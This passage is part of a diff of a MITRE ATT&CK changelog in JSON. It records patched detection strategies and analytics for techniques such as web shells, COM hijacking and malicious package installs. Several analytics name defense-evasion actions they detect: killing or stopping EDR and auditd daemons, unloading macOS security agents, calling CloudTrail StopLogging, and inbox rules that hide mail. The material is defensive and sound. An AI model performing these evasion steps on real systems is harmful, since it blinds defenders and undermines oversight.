+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ee7bd8ff-fbfd-4bb2-9d23-cf3f6ed342c7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0248",
+                            "external_id": "DET0248"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "User Execution \u2013 Malicious Image (containers & IaaS) \u2013 pull/run \u2192 start \u2192 anomalous behavior (T1204.003)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4c16cebd-ac7e-472a-ae12-62966cbd19e2",
+                        "x-mitre-analytic--7b711402-12f7-4985-93df-2693eaf9ebdb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b977bf63-8fe2-4538-b4f2-0098fe26d67b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0066",
+                            "external_id": "DET0066"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "User Execution \u2013 Malicious Link (click \u2192 suspicious egress \u2192 download/write \u2192 follow-on activity)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--12849ba4-39da-48c9-bf3d-c51a6cc3f85b",
+                        "x-mitre-analytic--bbfa2ed1-f8d5-44cf-9da8-5e3fed544172",
+                        "x-mitre-analytic--3f615721-c62f-4229-9c6e-cb873b2591e5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--70c9f174-2e96-4086-b59c-d2358e434f8e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0478",
+                            "external_id": "DET0478"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "User Execution \u2013 multi-surface behavior chain (documents/links \u2192 helper/unpacker \u2192 LOLBIN/child \u2192 egress)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dcd6253b-a986-4c8a-bd89-46389007ea83",
+                        "x-mitre-analytic--a6e7697d-f0b8-4fcc-b32a-fec5b28cd8f7",
+                        "x-mitre-analytic--66107cd1-c123-4ad5-bb0b-62d8a9a451a6",
+                        "x-mitre-analytic--3a6fdd1a-59c6-4f46-a761-0de502229da0",
+                        "x-mitre-analytic--e707cd33-8e20-4b1d-ad3f-fd3a3233fcdd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--09caebdc-2ce4-4698-a40c-d91cb65f9720",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0252",
+                            "external_id": "DET0252"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "User-Initiated Malicious Library Installation via Package Manager (T1204.005)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--223a39c8-d194-456e-be99-2db9e97ab7da",
+                        "x-mitre-analytic--05985fc7-44cf-4b28-8d4f-14c1662bc5ea",
+                        "x-mitre-analytic--98f18ad5-0def-4ac3-8822-7538f0a8d64d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5b998fb4-fb3f-4207-ae00-cdf0e1a22b76",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0168",
+                            "external_id": "DET0168"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Virtualization/Sandbox Evasion via System Checks across Windows, Linux, macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--04bcbbb7-bfa9-41a5-9fb8-72a6df9ad50b",
+                        "x-mitre-analytic--7b4b3b54-d992-4f03-922a-6eec96c9342e",
+                        "x-mitre-analytic--5a92bf3c-1832-453b-8ac9-24f8688d6faf"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--abb052c6-4edd-4592-9b9b-e53a55ac53b8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0394",
+                            "external_id": "DET0394"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Web Shell Detection via Server Behavior and File Execution Chains",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--66c98f78-2848-43f4-a69d-5562f03712ec",
+                        "x-mitre-analytic--9e80763b-5287-451f-b2ab-37168b159387",
+                        "x-mitre-analytic--e5a0bbf3-e5d0-41f1-b757-c67eccece77b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--78340b60-535e-4f2e-a376-c6fcc53a3c4a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0481",
+                            "external_id": "DET0481"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Windows COM Hijacking Detection via Registry and DLL Load Correlation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cda93955-7500-49dd-9150-94bedae91d22"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a1b25828-57bf-470c-8f47-8ad4e1f6bbdb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0418",
+                            "external_id": "DET0418"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Windows DACL Manipulation Behavioral Chain Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7e4ac594-c46c-4c7e-ba6d-9a457ab1e767"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b661f959-953f-4329-a43a-f1b060e7626b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0026",
+                            "external_id": "DET0026"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Windows Detection Strategy for T1547.012 - Print Processor DLL Persistence",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ffe7278f-7cd1-402f-a3a7-dcc7a363b031"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2dd0f2ef-2c31-4b11-a507-91067bb61787",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0395",
+                            "external_id": "DET0395"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "macOS AuthorizationExecuteWithPrivileges Elevation Prompt Detection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--aae53d47-1f26-426b-9e50-848f186fed99"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "analytics": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--a09ed72b-be04-475f-8c0a-11ed47b40bd1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0192#AN0551",
+                            "external_id": "AN0551"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 0551",
+                    "description": "Suspicious creation or modification of inbox rules through PowerShell (New-InboxRule, Set-InboxRule) to automatically delete, move, or hide emails. Defender perspective: unusual rule activity correlated with mailbox access and filtering patterns.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "EventCode=4103, 4104, 4105, 4106"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "m365:unified",
+                            "channel": "New-InboxRule or Set-InboxRule events recorded in Exchange Online"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "SuspiciousKeywords",
+                            "description": "Keywords like 'phish', 'malware', 'suspicious' used in inbox rules to hide emails."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Scope mailbox monitoring to high-value users such as executives or admins."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-03-13 23:17:37.896000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--bda03bab-3f0b-4bd0-8a8f-77bcb2b1ee7d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN1370",
+                            "external_id": "AN1370"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1370",
+                    "description": "Detects kill/systemctl/service commands against EDR, auditd, falco, osquery, rsyslog, journald, or agent processes; configuration edits disabling startup; module unload attempts; abrupt cessation of logs after privileged shell execution.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: systemctl stop, service stop, or kill -9 on security daemons (e.g., falcon-sensor, auditd)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "delete: Modification of systemd unit files or config for security agents"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "AgentServiceNames",
+                            "description": "List of endpoint protection service names (varies across deployments)."
+                        },
+                        {
+                            "field": "AllowedAdminAccounts",
+                            "description": "Accounts permitted to legitimately stop or reconfigure services."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Linux"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-04-24 20:33:02.253000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--9e9a5111-038b-4c68-a8bc-6d094723def4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN1371",
+                            "external_id": "AN1371"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1371",
+                    "description": "Detection of adversary disabling endpoint security tools by unloading launch agents/daemons, modifying configuration profiles, or disabling Gatekeeper/XProtect/logging settings, or removing endpoint agents followed by telemetry loss.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of launchctl unload, kill, or removal of security agent daemons"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of system configuration profiles affecting security tools"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "DaemonNames",
+                            "description": "Expected security agent daemons (e.g., com.crowdstrike.falcon.Agent)."
+                        },
+                        {
+                            "field": "TimeWindow",
+                            "description": "Detection correlation period for multiple security tool disable actions."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-04-24 20:32:42.659000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--5d329e39-a38b-47cd-8d3d-fa7515280fd7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN1372",
+                            "external_id": "AN1372"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1372",
+                    "description": "Correlates control-plane API actions disabling cloud-native monitoring or sensor agents (CloudTrail, GuardDuty, Security Hub, Defender, monitoring agents), role abuse preceding disablement, or instance agent uninstall events",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--e52d89f9-1710-4708-88a5-cbef77c4cd5e",
+                            "name": "AWS:CloudTrail",
+                            "channel": "Delete* / Stop*: DeleteAlarms, StopLogging, or DisableMonitoring API calls"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "APIActions",
+                            "description": "Customizable list of cloud provider API calls related to monitoring/alerting disablement."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Distinguishes adversary actions from authorized DevOps/CloudOps activities."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-04-24 20:31:55.528000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f421cbe1-d42e-45e9-adad-12c6ed0a5cb8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN1373",
+                            "external_id": "AN1373"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1373",
+                    "description": "Detects disabling container runtime security controls, removing sidecar sensors, modifying seccomp/AppArmor profiles, mounting host proc/sys paths to interfere with host logging, or killing in-container monitoring agents.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
+                            "name": "kubernetes:audit",
+                            "channel": "kubectl delete or patch of security pods/admission controllers"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "NamespaceExclusions",
+                            "description": "Exclusion of namespaces where temporary deletion of monitoring tools is legitimate (e.g., staging)."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Containers"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-04-24 20:33:43.898000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--e542342f-5a08-408d-b292-797bcb2da5eb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
